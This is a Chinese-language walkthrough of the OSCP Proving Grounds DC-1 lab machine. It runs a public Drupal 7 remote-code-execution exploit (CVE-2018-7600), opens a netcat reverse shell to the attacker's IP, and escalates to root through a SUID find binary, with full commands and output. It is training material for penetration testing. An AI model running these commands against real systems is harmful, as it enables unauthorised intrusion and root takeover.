OSCP - Proving Grounds - DC - 1

主要知识点

  • drupal 7 RCE
  • find SUID提权

具体步骤

nmap起手,80端口比较有意思,安装了 Drupal 7

复制代码
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 14:23 UTC
Nmap scan report for 192.168.57.193
Host is up (0.00087s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35155/tcp6  status
|   100024  1          52829/tcp   status
|   100024  1          55282/udp6  status
|_  100024  1          60444/udp   status
52829/tcp open  status  1 (RPC #100024)

不过目前不知道具体的小版本信息,不过我们可以广泛搜索并尝试一下可能的exp ,比如GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600

下载并执行,成功,果然是这个exp

复制代码
C:\home\kali\Documents\OFFSEC\play\DC-1\CVE-2018-7600-master> python drupa7-CVE-2018-7600.py http://192.168.168.193 -c 'pwd'

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-7g3HIuyYpC29j2w81bwTC6UaPzNaAwKjGn66P287Yws
[*] Triggering exploit to execute: pwd
/var/www

下面我们用这个exp来创建反弹shell(一定要先在本地启动nc 命令监听),reverse shell成功创建后发现find命令具有SUID权限

复制代码
C:\home\kali\Documents\OFFSEC\play\DC-1\CVE-2018-7600-master> python drupa7-CVE-2018-7600.py http://192.168.168.193 -c 'nc -e /bin/bash 192.168.45.240 80'     

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-cILshiFYqC-hWCdK365kKueGh6Epmbw607At66yyXKQ
[*] Triggering exploit to execute: nc -e /bin/bash 192.168.45.240 80
......
......

C:\home\kali\Documents\OFFSEC\play\DC-1> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.240] from (UNKNOWN) [192.168.168.193] 35956
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
find / -type f -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

按照GTFObins的描述来实现是会失败的

会报错

复制代码
www-data@DC-1:/var/www$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
/bin/sh: 0: Illegal option -p

我们这里稍微改一下 ,改为 ./find . -exec /bin/bash -p \; -quit,就会成功提权

复制代码
www-data@DC-1:/var/www$ find . -exec /bin/bash -p \; -quit
find . -exec /bin/bash -p \; -quit
bash-4.2# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
bash-4.2# whoami
whoami
root
bash-4.2# cat /root/proof.txt
cat /root/proof.txt
623e6080542979c3af71a73b8aa28119
相关推荐
北京盟通科技官方账号5 小时前
工业安全:FSoE (Fail Safe over EtherCAT) 常见技术问题解析
安全·具身智能·ethercat·人形机器人·工业安全·fsoe·ecmaster
kobesdu5 小时前
AGV安全防护全解析:安全产品分类与简介
人工智能·安全·移动机器人
KKKlucifer5 小时前
纵深防御视角下安全运维服务体系构建思路
运维·网络·安全
星幻元宇VR6 小时前
VR观景台推动安全科普走向沉浸体验
科技·学习·安全·vr·虚拟现实
菩提小狗6 小时前
每日安全情报报告 · 2026-04-30
网络安全·漏洞·cve·安全情报·每日安全
志栋智能6 小时前
超自动化安全:数字时代的网络免疫系统
网络·安全·自动化
JS_SWKJ6 小时前
网络安全隔离设备行业动态:政策强驱动下的“主动防御”与“智能隔离”新纪元
安全·web安全
南行*6 小时前
Intel Pin 插桩
安全·网络安全
skilllite作者6 小时前
Warp 新手极速上手与部署指南
java·前端·笔记·安全·agentskills
Le_ee6 小时前
winXP栈溢出漏洞深度学习
网络安全·安全性测试·栈溢出·ollydbg